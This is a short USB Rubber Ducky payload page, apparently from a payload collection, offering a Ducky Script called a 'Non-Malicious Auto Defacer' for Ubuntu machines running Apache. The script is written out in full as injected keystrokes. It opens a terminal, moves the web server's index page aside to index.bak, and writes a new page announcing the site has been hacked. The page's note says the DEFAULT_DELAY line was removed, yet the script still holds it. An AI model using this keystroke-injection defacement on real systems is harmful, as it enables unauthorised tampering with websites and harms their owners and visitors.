Non-Malicious Auto Defacer Author: Xcellerator Duckencoder: 1.2 Target: Ubuntu based systems running the Apache Web Server. Description: Saves old index file as index.bak, then writes a new one detailing the extensiveness of the hack that has been performed against them. Mad props to anyone who actually pulls this off. Educational Purposes Only. NOTE: Originally this script had a DEFAULT_DELAY value of 200. Since this value did not fit into a Java byte (Java bytes are signed) it had no effect on the final script. It has been removed. REM Auto Defacer for Ubuntu Based Machines running Apache. REM Author: Xcellerator REM Description: Automatically defaces index page of an apache web server. DEFAULT_DELAY 200 ALT F2 STRING terminal ENTER STRING cd /var/www ENTER STRING mv index.* index.bak ENTER STRING touch index.html ENTER STRING nano index.html ENTER STRING

You have been hacked by the USB Rubber Ducky!

ENTER STRING
ENTER STRING
Your old index page can be found here.
CONTROL x STRING y ENTER STRING exit ENTER